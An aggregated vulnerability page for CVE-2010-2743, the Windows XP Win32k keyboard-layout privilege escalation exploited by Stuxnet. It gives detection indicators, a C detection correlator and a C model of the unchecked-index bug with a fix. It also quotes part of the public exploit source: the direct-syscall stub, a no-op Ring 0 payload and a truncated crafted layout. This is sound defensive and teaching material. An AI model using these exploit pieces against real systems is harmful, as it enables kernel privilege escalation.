CVE-2010-2743
Published: 2011-01-20
Priority: P2 · 70 · high
CVSS 2.0: 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
Tags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 14.85% (96.3th percentile)
The kernel-mode drivers in Microsoft Windows XP SP3 do not properly perform indexing of a function-pointer table during the loading of keyboard layouts from disk, which allows local users to gain privileges via a crafted application, as demonstrated in the wild in July 2010 by the Stuxnet worm, aka "Win32k Keyboard Layout Vulnerability." NOTE: this might be a duplicate of CVE-2010-3888 or CVE-2010-3889.
Detection & IOCs (extracted from sources)
- bytes: mov eax, 000011c6h; mov edx, 7ffe0300h; call dword ptr [edx]; retn 1Ch (the public exploit's direct-syscall stub for NtUserLoadKeyboardLayoutEx: the hardcoded XP SP3 service number 0x11c6 dispatched through the KiFastSystemCall pointer stored at KUSER_SHARED_DATA+0x300, i.e. 0x7ffe0300)
- bytes: \x90\x90\x90\x90\xC2\x0C\x00\x90\x90 (the proof-of-concept Ring 0 payload: four NOPs, ret 0Ch, two NOPs; it only returns cleanly to the kernel and performs no further action)
- Monitor calls to NtUserLoadKeyboardLayoutEx from user-mode processes that pass a handle to a crafted or malformed keyboard layout DLL together with a suspicious KLID value (e.g., 0x666); this syscall is the exploitation vector for this CVE.
- Detect creation of files with the extension .boom in the TEMP directory, particularly p0wns.boom, the malformed keyboard layout file dropped by the public exploit.
- Detect VirtualAlloc calls that request the fixed base address 0x60630000 with PAGE_EXECUTE_READWRITE protection; the exploit stages its Ring 0 shellcode there.
- The exploit calls SendInput with a null virtual key (wVk = 0x0) after loading the malformed keyboard layout to trigger shellcode execution; monitor for this pattern following a suspicious keyboard layout load.
- The public exploit targets Windows XP SP3 specifically: the NtUserLoadKeyboardLayoutEx syscall number (0x11c6) is hardcoded and version-specific, so the same binary will not work on other Windows versions without modification.
- CVE-2010-2743 may be a duplicate of CVE-2010-3888 or CVE-2010-3889; detection rules should cover all three CVE identifiers to avoid gaps.
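The indicators above describe one sequence of user-mode actions in a single process, so they are best checked as a stateful per-process correlation rather than as four independent rules. The C program below is an added example, not code from the page's sources or from the exploit: it replays a constructed event stream (the event structure, field names, process ids and file paths are assumptions of the demo, not a real sensor's schema) and folds each process's events into a bitmask of the indicators listed above, using the constants the list gives (0x60630000, PAGE_EXECUTE_READWRITE, KLID 0x666, wVk 0, *.boom under Temp).

```c
/*
 * Added example: stateful correlation of the CVE-2010-2743 exploit chain.
 * Event schema, pids and sample paths are assumptions for this demo.
 */
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PAGE_EXECUTE_READWRITE 0x40u        /* Win32 protection constant */
#define STAGING_ADDRESS        0x60630000u  /* fixed base the exploit requests */
#define SUSPICIOUS_KLID        0x666u       /* dwKLID passed by the exploit */

enum ev_kind { EV_FILE_CREATE, EV_VIRTUAL_ALLOC, EV_LOAD_KEYBOARD_LAYOUT, EV_SEND_INPUT };

struct event {
    enum ev_kind kind;
    uint32_t pid;
    const char *path;   /* EV_FILE_CREATE */
    uint32_t address;   /* EV_VIRTUAL_ALLOC: requested base, 0 = any */
    uint32_t protect;   /* EV_VIRTUAL_ALLOC: PAGE_* protection */
    uint32_t klid;      /* EV_LOAD_KEYBOARD_LAYOUT: dwKLID argument */
    uint16_t wvk;       /* EV_SEND_INPUT: KEYBDINPUT.wVk */
};

enum {
    IND_BOOM_FILE        = 1,  /* *.boom created under a Temp directory */
    IND_RWX_STAGING      = 2,  /* RWX allocation at the fixed staging address */
    IND_LAYOUT_LOAD      = 4,  /* keyboard layout load with KLID 0x666 */
    IND_SENDINPUT_NULLVK = 8   /* SendInput(wVk=0) after the suspicious load */
};

/* Case-insensitive substring test (paths on Windows are case-insensitive). */
static bool str_has_ci(const char *hay, const char *needle) {
    size_t n = strlen(needle);
    for (; *hay; hay++) {
        size_t i = 0;
        while (i < n && hay[i] &&
               tolower((unsigned char)hay[i]) == tolower((unsigned char)needle[i]))
            i++;
        if (i == n) return true;
    }
    return false;
}

static bool ends_with_ci(const char *s, const char *suf) {
    size_t ls = strlen(s), lf = strlen(suf);
    return ls >= lf && str_has_ci(s + ls - lf, suf);
}

/* Fold one event into the indicator bits already seen for its process. */
static unsigned apply_event(unsigned flags, const struct event *e) {
    switch (e->kind) {
    case EV_FILE_CREATE:
        if (e->path && str_has_ci(e->path, "\\temp\\") && ends_with_ci(e->path, ".boom"))
            flags |= IND_BOOM_FILE;
        break;
    case EV_VIRTUAL_ALLOC:
        if (e->address == STAGING_ADDRESS && (e->protect & PAGE_EXECUTE_READWRITE))
            flags |= IND_RWX_STAGING;
        break;
    case EV_LOAD_KEYBOARD_LAYOUT:
        if (e->klid == SUSPICIOUS_KLID)
            flags |= IND_LAYOUT_LOAD;
        break;
    case EV_SEND_INPUT:
        /* The null-key SendInput is the trigger, so it only counts after the load. */
        if (e->wvk == 0 && (flags & IND_LAYOUT_LOAD))
            flags |= IND_SENDINPUT_NULLVK;
        break;
    }
    return flags;
}

/* Replay the stream in order for one process and return its indicator bits. */
unsigned classify(const struct event *evs, size_t n, uint32_t pid) {
    unsigned flags = 0;
    for (size_t i = 0; i < n; i++)
        if (evs[i].pid == pid) flags = apply_event(flags, &evs[i]);
    return flags;
}

/* The file name is a weak indicator (trivially renamed); the staged RWX
 * allocation, the 0x666 layout load and the trigger together are the chain. */
const char *verdict(unsigned flags) {
    unsigned chain = IND_RWX_STAGING | IND_LAYOUT_LOAD | IND_SENDINPUT_NULLVK;
    if ((flags & chain) == chain) return "exploit-chain";
    if (flags & (IND_LAYOUT_LOAD | IND_RWX_STAGING | IND_BOOM_FILE)) return "suspicious";
    return "benign";
}

/* Constructed sample stream: pid 1337 replays the exploit's steps (with one
 * SendInput that arrives too early to count), pid 42 is a benign process. */
const struct event sample_events[] = {
    { .kind = EV_FILE_CREATE, .pid = 1337,
      .path = "C:\\Documents and Settings\\user\\Local Settings\\Temp\\p0wns.boom" },
    { .kind = EV_VIRTUAL_ALLOC, .pid = 42, .address = 0, .protect = 0x04 /* PAGE_READWRITE */ },
    { .kind = EV_VIRTUAL_ALLOC, .pid = 1337, .address = STAGING_ADDRESS, .protect = PAGE_EXECUTE_READWRITE },
    { .kind = EV_LOAD_KEYBOARD_LAYOUT, .pid = 42, .klid = 0x409 },
    { .kind = EV_SEND_INPUT, .pid = 1337, .wvk = 0 },      /* before the load: ignored */
    { .kind = EV_LOAD_KEYBOARD_LAYOUT, .pid = 1337, .klid = SUSPICIOUS_KLID },
    { .kind = EV_SEND_INPUT, .pid = 42, .wvk = 0x41 },
    { .kind = EV_SEND_INPUT, .pid = 1337, .wvk = 0 },      /* after the load: trigger */
};
#define SAMPLE_COUNT (sizeof sample_events / sizeof sample_events[0])

int main(void) {
    uint32_t pids[] = { 1337, 42 };
    for (size_t i = 0; i < 2; i++) {
        unsigned f = classify(sample_events, SAMPLE_COUNT, pids[i]);
        printf("pid %u: indicators=0x%x verdict=%s\n", (unsigned)pids[i], f, verdict(f));
    }
    return 0;
}
```

Ordering matters: a wVk=0 SendInput seen before any suspicious layout load is ignored, which is what the fourth bullet describes, and the verdict deliberately does not require the .boom file name because a rebuilt exploit can drop the layout under any name while still needing the fixed RWX staging allocation, the KLID 0x666 load and the trigger.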
CVSS provenance
- nvd (v2.0): 7.2 HIGH, AV:L/AC:L/Au:N/C:C/I:C/A:C
- vulncheck: 7.2 HIGH
GHSA
GHSA-ggjq-qv33-pv47 · ghsa_unreviewed · 2022-05-14 · CVSS 7.2 · CVE-2010-2743 [HIGH]
Description: identical to the NVD text above.
VulnCheck
Microsoft Windows Win32k Keyboard Layout Privilege Escalation · vulncheck · 2010 · CVSS 7.2 · CVE-2010-2743 [HIGH]
Description: identical to the NVD text above.
Affected: Microsoft Windows
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf
No detection rules found.
Exploit-DB
Microsoft Win32k - Keyboard Layout (MS10-073) · exploitdb · 2011-01-13 · CVE-2010-2743
---
// My koala is staring at you CºgºD
// Source: http://reversemode.com/index.php?option=com_content&task=view&id=71&Itemid=1
#include <windows.h>    // HANDLE, HKL, VirtualAlloc, SendInput
#include <winternl.h>   // UNICODE_STRING / PUNICODE_STRING
#include <string.h>     // wcslen
#include <stdio.h>
#define MAGIC_OFFSET 0x6261
// Fill a UNICODE_STRING from a wide C string (Length/MaximumLength are in bytes).
#define InitializeUnicodeStr(p,s) { \
    (p)->Length= wcslen(s)*2; \
    (p)->MaximumLength = wcslen(s)*2+2; \
    (p)->Buffer = s; \
}
// Direct syscall stub for win32k!NtUserLoadKeyboardLayoutEx, bypassing user32.dll.
// 0x11c6 is the Windows XP SP3 system service number (version-specific), and
// 0x7ffe0300 is KUSER_SHARED_DATA.SystemCall, the pointer to the KiFastSystemCall
// stub; retn 1Ch pops the seven DWORD arguments (7 * 4 = 0x1C) as __stdcall requires.
_declspec(naked) HKL __stdcall NtUserLoadKeyboardLayoutEx
(
    IN HANDLE Handle,
    IN DWORD offTable,
    IN PUNICODE_STRING puszKeyboardName,
    IN HKL hKL,
    IN PUNICODE_STRING puszKLID,
    IN DWORD dwKLID,
    IN UINT Flags
)
{
    __asm
    {
        mov eax, 000011c6h
        mov edx, 7ffe0300h
        call dword ptr [edx]
        retn 1Ch
    }
}
// Ring 0 proof-of-concept payload: four NOPs, then "ret 0Ch" (0xC2 0x0C 0x00), which
// returns to the kernel caller and discards three DWORD arguments. It demonstrates
// control of execution in Ring 0 and performs no further action.
unsigned char shellcode[]="\x90\x90\x90\x90\xC2\x0C\x00\x90\x90";
// Malformed keyboard layout image, written to %TEMP%\p0wns.boom (listing cut off here)
unsigned char fakeDll[]="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
Exploit-DB
Microsoft Internet Explorer - XML Core Services HTTP Request Handling (MS06-071) (Metasploit) · exploitdb · 2010-07-03 · CVE-2006-5745
This entry is for CVE-2006-5745 (MS06-071), not CVE-2010-2743; the only "2743" in it is the milw0rm exploit ID from which the module was derived.
---
##
# $Id: ms06_071_xml_core.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  # (Rank and mixin declarations are absent from the published listing)
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Internet Explorer XML Core Services HTTP Request Handling',
      'Description' => %q{
        This module exploits a code execution vulnerability in Microsoft XML Core Services which
        exists in the XMLHTTP ActiveX control. This module is the modified version of
        http://www.milw0rm.com/exploits/2743 - credit to str0ke. This module has been successful
Metasploit
Windows Escalate NtUserLoadKeyboardLayoutEx Privilege Escalation · metasploit
This module exploits the keyboard layout vulnerability exploited by Stuxnet. When processing specially crafted keyboard layout files (DLLs), the Windows kernel fails to validate that an array index is within the bounds of the array. By loading a specially crafted keyboard layout, an attacker can execute code in Ring 0.
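The CVE description and the Metasploit summary above describe the same defect: an index taken from an attacker-supplied keyboard layout file selects an entry of a kernel function-pointer table, and the kernel never checks that the index is inside the table, so a large value dispatches through whatever memory follows it. The C model below is an added example, not win32k code and not the exploit's or the module's code; the layout header format, the table names and the table size are assumptions made for the demonstration. It shows the vulnerable dispatch beside the hardened one, run over two constructed layout headers.

```c
/*
 * Added example: model of the CVE-2010-2743 bug class (unchecked index from
 * a file into a function-pointer table). Not win32k.sys code; header layout,
 * table names and sizes are assumptions for the demo.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef int (*layout_handler_t)(void);

#define TABLE_ENTRIES 4   /* size of the legitimate table (assumed) */
#define SPILL_ENTRIES 8   /* memory that happens to follow the table in this model */

static int handler_standard(void) { return 1; }
static int handler_extended(void) { return 2; }
static int handler_unused(void)   { return 0; }

/* What the attacker wants reached: in the real exploit this is the Ring 0
 * payload staged at 0x60630000. Here it only returns a marker value. */
static int attacker_payload(void) { return 0xBAD; }

/*
 * One contiguous array stands in for the kernel table plus the memory after
 * it. Entries [0, TABLE_ENTRIES) are the real table; the rest is adjacent
 * memory the attacker has arranged to hold pointers to the payload. Keeping
 * both in one allocation keeps the demo's out-of-bounds read well defined.
 */
static layout_handler_t g_memory[TABLE_ENTRIES + SPILL_ENTRIES] = {
    handler_standard, handler_extended, handler_unused, handler_unused,
    attacker_payload, attacker_payload, attacker_payload, attacker_payload,
    attacker_payload, attacker_payload, attacker_payload, attacker_payload,
};
static layout_handler_t *const g_dispatch_table = g_memory;

/* Minimal header of the model layout file: a tag plus the handler index. */
struct layout_header {
    uint8_t tag[2];         /* 'K','L' in this model */
    uint8_t handler_index;  /* attacker-controlled */
    uint8_t reserved;
};

static int parse_header(const uint8_t *file, size_t len, struct layout_header *out) {
    if (len < sizeof *out) return -1;
    memcpy(out, file, sizeof *out);
    if (out->tag[0] != 'K' || out->tag[1] != 'L') return -1;
    return 0;
}

/* Vulnerable form: dispatches on the file's index without comparing it to the
 * table size. The single guard against leaving g_memory exists only so the
 * demo stays defined behaviour; it is not part of the bug model. */
int load_layout_vulnerable(const uint8_t *file, size_t len) {
    struct layout_header h;
    if (parse_header(file, len, &h) != 0) return -1;
    if (h.handler_index >= TABLE_ENTRIES + SPILL_ENTRIES) return -1;  /* demo guard */
    return g_dispatch_table[h.handler_index]();   /* no check against TABLE_ENTRIES */
}

/* Hardened form: validate the index against the table length before using it
 * and reject the file instead of dispatching. */
int load_layout_fixed(const uint8_t *file, size_t len) {
    struct layout_header h;
    if (parse_header(file, len, &h) != 0) return -1;
    if (h.handler_index >= TABLE_ENTRIES) return -2;  /* out-of-range index: reject */
    return g_dispatch_table[h.handler_index]();
}

/* Constructed sample files. */
const uint8_t layout_benign[4]  = { 'K', 'L', 1, 0 };  /* index 1: handler_extended */
const uint8_t layout_crafted[4] = { 'K', 'L', 6, 0 };  /* index 6: past the table */

int main(void) {
    printf("benign  vulnerable=%d fixed=%d\n",
           load_layout_vulnerable(layout_benign, sizeof layout_benign),
           load_layout_fixed(layout_benign, sizeof layout_benign));
    printf("crafted vulnerable=0x%x fixed=%d\n",
           load_layout_vulnerable(layout_crafted, sizeof layout_crafted),
           load_layout_fixed(layout_crafted, sizeof layout_crafted));
    return 0;
}
```

The benign file behaves identically under both forms; the crafted file reaches the attacker's function through the vulnerable dispatch and is rejected by the hardened one. The point for reviewers of similar code is that the index comes from a file the caller controls, so it must be treated as untrusted input and validated against the table length at the point of use, not trusted because the file "looks like" a layout.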
arXiv
Securing The Kernel via Static Binary Rewriting and Program Shepherding · arxiv_fulltext · 2011-05-10
## Abstract
Recent Microsoft security bulletins show that kernel vulnerabilities are becoming more and more important security threats. Despite the pretty extensive security mitigations many of the kernel vulnerabilities are still exploitable. Successful kernel exploitation typically grants the attacker maximum privilege level and results in total machine compromise.
To protect against kernel exploitation, we have developed a tool which statically rewrites the Microsoft Windows kernel as well as other kernel level modules. Such rewritten binary files allow us to monitor control flow transfers during operating system execution. At this point we are able to detect whether selected control transfer flow is valid or should be considered as an attack attempt.
Our solution is especially direc
Tenable
Microsoft Patch Tuesday Roundup - October 2010 - "Nightmare" Edition · blogs_tenable · 2010-10-14
References
- http://www.us-cert.gov/cas/techalerts/TA10-285A.html
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-073
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7514